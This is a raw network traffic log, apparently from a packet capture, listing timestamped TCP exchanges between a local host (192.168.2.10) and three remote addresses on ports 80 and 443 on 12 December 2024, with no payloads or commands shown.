                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.433593035 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.433639050 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.433762074 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.433804035 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.434694052 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.434720039 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.434761047 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.434803009 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.434817076 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.434851885 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.436492920 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.436580896 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.436597109 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.436640978 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.437129974 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.437177896 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.437299967 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.437407970 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.438380957 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.438424110 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.438483953 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.438529015 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.439537048 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.439583063 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.439618111 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.439680099 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.440694094 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.440737009 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.440766096 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.440803051 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.441910982 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.441996098 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.442162991 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.442209959 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.443109035 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.443151951 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.443183899 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.443224907 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.444292068 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.444338083 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.444397926 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.444432020 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.445468903 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.445542097 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.445574999 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.445684910 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.446686029 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.446729898 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.446763039 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.446799040 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.447865963 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.447911978 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.447953939 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.447978020 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.448005915 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.448040962 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.449070930 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.449110985 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.449275017 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.449321032 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.450225115 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.450277090 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.450337887 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.450387001 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.451427937 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.451478958 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.451558113 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.451597929 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.452681065 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.452725887 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.452801943 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.452840090 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.453838110 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.453881025 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.453915119 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.454020023 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.455003023 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.455123901 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.455144882 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.455194950 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.456226110 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.456264973 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.456305027 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.456338882 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.457572937 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.457613945 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.457657099 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.457695961 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.458643913 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.458686113 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.458888054 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.458926916 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.459780931 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.459835052 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.459876060 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.459917068 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.460964918 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.461014986 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.461033106 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.461070061 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.462153912 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.462198019 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.462234020 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.462272882 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.463340998 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.463387012 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.463416100 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.463449955 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.464560032 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.464605093 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.464704037 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.464741945 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.465778112 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.465817928 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.465910912 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.466341972 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.466926098 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.466976881 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.467158079 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.467196941 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.468107939 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.468152046 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.468203068 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.468242884 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.469317913 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.469357967 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.469423056 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.469464064 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.470489979 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.470534086 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.470618963 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.470659018 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.471693993 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.471740961 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.471829891 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.471868038 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.472904921 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.472953081 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.472985029 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.473027945 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.474086046 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.474140882 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.474169970 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.474210024 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.475263119 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.475322962 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.475382090 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.475429058 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.476480007 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.476525068 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.476552963 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.476597071 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.477665901 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.477713108 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.477720976 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.477767944 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.478871107 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.478918076 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.479053974 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.479096889 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.480082035 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.480185986 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.554251909 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.554333925 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.554362059 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.554403067 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.556803942 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.556852102 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.609888077 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.609929085 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.609951019 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.609976053 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.610373020 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.610423088 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.610491991 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.610539913 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.611644983 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.611700058 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.611705065 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.611745119 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.612783909 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.612826109 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.612869978 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.612910032 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.614145994 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.614197969 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.614202023 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.614239931 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.615195990 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.615251064 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.615287066 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.615334034 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.616439104 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.616491079 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.616547108 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.616590023 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.617553949 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.617604017 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.626625061 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.626668930 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.630485058 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.630530119 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.630548000 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.630605936 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.636207104 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.636251926 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.644198895 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.644247055 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.645545959 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.645586967 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.653395891 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.653439999 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.655309916 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.655375004 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.662640095 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.662695885 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.669084072 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.669132948 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.673078060 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.673248053 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.682637930 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.682696104 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.685786963 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.685847044 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.696342945 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.696434975 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.701020002 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.701071978 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.711184978 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.711250067 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.714070082 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.714123011 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.723843098 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.723898888 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.727008104 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.727065086 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.737858057 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.737921000 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.740354061 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.740401030 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.752921104 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.752975941 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.753602028 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.753645897 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.764754057 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.764880896 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.791987896 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.792124987 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.792145967 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.792191982 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.792382002 CET4434989534.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.792450905 CET49895443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.796765089 CET49895443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.796772957 CET4434989534.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.797175884 CET4434989534.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.797259092 CET49895443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.797663927 CET49895443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.818881035 CET44349883172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.818954945 CET49883443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:25.818989038 CET44349883172.217.17.65192.168.2.10
